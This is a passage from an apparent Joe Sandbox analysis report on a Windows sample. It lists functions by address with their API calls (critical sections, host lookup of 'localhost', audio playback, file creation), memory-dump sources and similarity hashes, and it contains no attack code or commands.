                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3545
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3556
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F355F
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3594
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F359D
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36AD
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36BB
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2801635615-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 93c01fc31a9ee7373f9c1d93048bf40271cec5808ab28bfcb2eca2428eaae834
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F51BE3020474A9BD7249F319558BBBBBF8AF84742F04485EE5DEC3361DB28EA08C724
                                                                                                                                                                                                                                                                                                                          Function 004F36F0 Relevance: 11.3, APIs: 9, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 004F3709
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F374C
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F375C
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F376D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F377A
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F37A9
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F37C5
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F37D5
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F37EC
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1822ab8b2bc00c4b335a7296647f06df4fe24da2c1cedc303b1505dbbb5a7089
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2831D1B11087894BC610AF35A9807EBFBF8BF89714F04499DE5E953251C734AA1DC726
                                                                                                                                                                                                                                                                                                                          Function 004D7D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102networkCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: gethostbynamehtonlhtonsinet_addr
                                                                                                                                                                                                                                                                                                                          • String ID: localhost
                                                                                                                                                                                                                                                                                                                          • API String ID: 4009071410-2663516195
                                                                                                                                                                                                                                                                                                                          • Opcode ID: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                                                                                                                                          • Instruction ID: cf482c115b2fa46a5b5609c5aae3d134ea41c2cdeafd480f3feffcf81808ee73
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9131ED30208311ABDB20DF249C85BBBB7E5FF95710F004A1EF9559B381E7719948C7A6
                                                                                                                                                                                                                                                                                                                          Function 004144DE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 324timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(00000000), ref: 004145E1
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Timetime
                                                                                                                                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                                                          • API String ID: 17336451-2178600047
                                                                                                                                                                                                                                                                                                                          • Opcode ID: a6eb4a1a4bf024f16c397edd5e841aed2049ab2de515439dd25e44f6491a1c28
                                                                                                                                                                                                                                                                                                                          • Instruction ID: e32ce3efbecf0e845fb5c017bd6949167df468d5a0ad1b28c98723774e94ba96
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6eb4a1a4bf024f16c397edd5e841aed2049ab2de515439dd25e44f6491a1c28
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79C17E313046059BD718DF15C494BEA77A6BFC8704F18856EE8498F382CB79ED42CB9A
                                                                                                                                                                                                                                                                                                                          Function 004D8B00 Relevance: 9.1, APIs: 6, Instructions: 53sleepCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • timeKillEvent.WINMM(?), ref: 004D8B13
                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001,?,0041D4A9), ref: 004D8B2D
                                                                                                                                                                                                                                                                                                                          • waveOutReset.WINMM(?,?,0041D4A9), ref: 004D8B34
                                                                                                                                                                                                                                                                                                                          • waveOutUnprepareHeader.WINMM(?,-000013C4,00000020,?,?,0041D4A9), ref: 004D8B5A
                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001,?,?,0041D4A9), ref: 004D8B63
                                                                                                                                                                                                                                                                                                                          • waveOutClose.WINMM(?,?,0041D4A9), ref: 004D8B86
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: wave$Sleep$CloseEventHeaderKillResetUnpreparetime
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3030913982-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 723e303dfaa0e6e3e16fcc3d7d301ea8209cd941138754b25ec6b12d62c8e06b
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0401ADB5A00214ABC3149F14EC88AAEB7F8FB98B11F00091BF41497301CB79A9598BF5
                                                                                                                                                                                                                                                                                                                          Function 004CF830 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000,?,?,?,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF94E
                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,-00000001,00000000,00000000,2E736D6D,?,?,00000000,00000000), ref: 004CF99D
                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000), ref: 004CF9BF
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                                                                                                                          • API String ID: 823142352-4282027825
                                                                                                                                                                                                                                                                                                                          • Opcode ID: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                                                                                                                                          • Instruction ID: d900b4c61e2357813c95f9d4093febd61d3ae0210469f6574eac6d9984f09979
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A141C2B5904300BBEB50EB21DC86F1B77A9EB89348F24092EF54597381D63DDC48C7A6
                                                                                                                                                                                                                                                                                                                          Function 004DD6F0 Relevance: 8.8, APIs: 7, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,004DDFDB,000000FF,00000001,004DE7BA), ref: 004DD6FC
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004DD71E
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004FA760: EnterCriticalSection.KERNEL32(?,?,00000000,7734E820,?,004DD732), ref: 004FA76A
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004FA760: LeaveCriticalSection.KERNEL32(?), ref: 004FA77A
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004DC9A0: EnterCriticalSection.KERNEL32 ref: 004DCA0C
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004DC9A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 004DCA1D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD741
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD744
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004DD74C
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD771
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD774
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
